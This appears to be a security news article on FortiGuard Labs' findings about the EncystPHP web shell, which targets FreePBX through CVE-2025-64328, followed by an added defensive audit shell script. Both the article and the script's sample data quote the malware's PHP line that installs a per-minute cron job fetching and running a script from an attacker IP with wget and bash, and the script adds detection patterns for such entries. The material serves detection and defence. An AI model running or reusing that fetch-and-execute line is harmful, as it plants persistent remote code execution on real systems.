The EncystPHP file flow | Image: FortiGuard Labs
A sophisticated new web shell has been discovered burrowing into communication infrastructure, leveraging a critical vulnerability to turn innocent phone systems into persistent backdoors. Dubbed “EncystPHP” by researchers at FortiGuard Labs, this malware is the latest weapon in a campaign targeting FreePBX environments, a popular open-source platform for managing voice-over-IP (VoIP) services.
The attacks, which began in early December, exploit a post-authentication command-injection vulnerability (CVE-2025-64328) to gain a foothold. Because the flaw is post-authentication, the attacker must first authenticate to the FreePBX web interface; the injection then runs operating-system commands on the PBX host. Once inside, the malware “features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment”.
The campaign appears to be the work of a familiar adversary. FortiGuard Labs has linked the activity to the hacker group INJ3CTOR3, a threat actor with a history of targeting VoIP systems.
First identified in 2020 targeting CVE-2019-19006, the group later shifted its sights to Elastix systems in 2022. Now, they have evolved again. “We assess that this campaign represents recent attack activity and behavior patterns associated with INJ3CTOR3,” the report states.
The observed incidents follow a distinct pattern: “exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments”. In one documented case, the exploit originated from Brazil and struck a victim environment managed by an Indian technology company specializing in cloud and communication services.
EncystPHP is designed to blend in. By mimicking legitimate FreePBX components, it attempts to “evade immediate detection,” making it a silent resident on compromised servers.
However, its capabilities are loud and clear. The web shell provides attackers with a robust toolkit for controlling the victim machine. It allows them to execute arbitrary system commands, effectively giving them the keys to the PBX kingdom.
Perhaps most alarming is the malware’s focus on staying power. The report details how EncystPHP establishes persistence using standard Linux tools, ensuring it survives system reboots or simple cleanups.
“It sets up cron jobs using wget to download and execute scripts from an external IP (45.234.176.202),” the analysis reveals. The malware also attempts to cover its tracks, executing commands like rm -rf /tmp/* to delete temporary files and sed to scrub logs.
The persistence script, identified as license.php, includes a line such as: system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -"); The cron expression */1 * * * * fires every minute, so the stage at /var/lib/asterisk/bin/devnull2 is re-downloaded and re-executed continuously, which restores it after a reboot or after the file is deleted. Note also that crontab - replaces the invoking user's entire crontab with what it reads on standard input, so any legitimate jobs belonging to that account are discarded; a crontab consisting of just this one entry is itself a tell during an audit.
This incident serves as a stark warning that communication systems remain high-value targets for cybercriminals. “This incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells… underscoring that unpatched PBX systems remain high-value targets”.
Administrators running FreePBX are urged to patch immediately and audit their systems for any signs of the EncystPHP shell or unauthorized cron jobs: check the crontabs of the asterisk and root accounts and the files under /etc/cron.d, look for unexpected files under /var/lib/asterisk/bin, review the FreePBX web directories for PHP files that do not belong to an installed module, and treat the address 45.234.176.202 as an indicator in firewall and proxy logs. Because the web shell mimics legitimate FreePBX components, a plausible-looking filename is not a reliable signal on its own. As the researchers note, while the techniques aren’t entirely new, the threat is “active and ongoing”.
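As an added example (not FortiGuard Labs' code and not part of the FreePBX project), the following POSIX shell script turns the persistence details quoted above and the audit advice into something an administrator can run. It flags crontab entries that reference 45.234.176.202 or /var/lib/asterisk/bin/devnull2, or that follow the generic "download a file, then execute it" shape of the reported entry, and it flags PHP source that installs a crontab from inside a system()-style call the way license.php does. The sample crontab and PHP text are constructed for the example, the default web-root path /var/www/html is an assumption, and the live-host scan (enabled with ENCYST_LIVE=1) needs root to read other users' crontabs.

```shell
#!/bin/sh
# Added audit script (not FortiGuard Labs' or the FreePBX project's code).
# It looks for the two persistence artifacts reported for EncystPHP:
#   1. crontab entries that fetch and run a script from 45.234.176.202 or
#      drop it at /var/lib/asterisk/bin/devnull2, plus the generic
#      "download, then execute" shape such entries take;
#   2. PHP source that pipes a shell command into "crontab -", as the
#      quoted license.php line does.
# The sample crontab and PHP text below are constructed for this example.

IOC_IP='45\.234\.176\.202'
IOC_PATH='/var/lib/asterisk/bin/devnull2'
# Generic shape: wget/curl ... ; bash|sh <file>
DL_EXEC_RE='(wget|curl)[^;&|]*;[[:space:]]*(bash|sh)[[:space:]]'
# PHP command-execution call whose argument pipes into "crontab -"
PHP_CRON_RE='(system|exec|shell_exec|passthru|popen)[[:space:]]*\(.*\|[[:space:]]*crontab[[:space:]]+-'

# encyst_scan_cron: read crontab text on stdin, print non-comment lines that
# match any indicator. Exit status is grep's: 0 when a line matched, 1 if clean.
encyst_scan_cron() {
    grep -v '^[[:space:]]*#' \
    | grep -E -e "$IOC_IP" -e "$IOC_PATH" -e "$DL_EXEC_RE"
}

# encyst_count_hits: number of suspicious crontab lines on stdin (always exits 0).
encyst_count_hits() {
    encyst_scan_cron | wc -l | tr -d ' '
}

# encyst_scan_php: read PHP source on stdin, print lines that install a
# crontab from inside PHP.
encyst_scan_php() {
    grep -E "$PHP_CRON_RE"
}

# encyst_audit_host: scan every user crontab, the system cron files and the
# FreePBX web root on a live host. Needs root. The web-root default is an
# assumption; pass the real path as the first argument if it differs.
encyst_audit_host() {
    webroot="${1:-/var/www/html}"
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -u "$u" -l 2>/dev/null | encyst_scan_cron | sed "s/^/[cron:$u] /"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | encyst_scan_cron | sed 's/^/[cron:system] /'
    find "$webroot" -type f -name '*.php' -exec grep -H -E "$PHP_CRON_RE" {} + 2>/dev/null
}

# Constructed sample: two legitimate entries around the reported malicious one.
SAMPLE_CRONTAB=$(cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/sbin/asterisk -rx "core reload"
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
30 4 * * 0 /usr/local/bin/fwconsole backup --id=1
EOF
)

# Constructed sample mirroring the license.php line quoted in the article.
SAMPLE_PHP=$(cat <<'EOF'
<?php
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");
EOF
)

# Offline demonstration against the constructed samples.
printf '%s\n' "$SAMPLE_CRONTAB" | encyst_scan_cron || echo "crontab sample: no hits"
printf '%s\n' "$SAMPLE_PHP" | encyst_scan_php || echo "php sample: no hits"

# Live scan only when explicitly requested.
if [ "${ENCYST_LIVE:-0}" = 1 ]; then
    encyst_audit_host "$@"
fi
```

Run it as-is to see the two sample hits, or as `ENCYST_LIVE=1 sh encyst_audit.sh /var/www/html` (file name assumed) on a suspect host. The generic download-then-execute pattern deliberately casts a wider net than the literal indicators, because a blocked IP or a renamed drop path defeats those; treat its hits as leads to triage rather than confirmations.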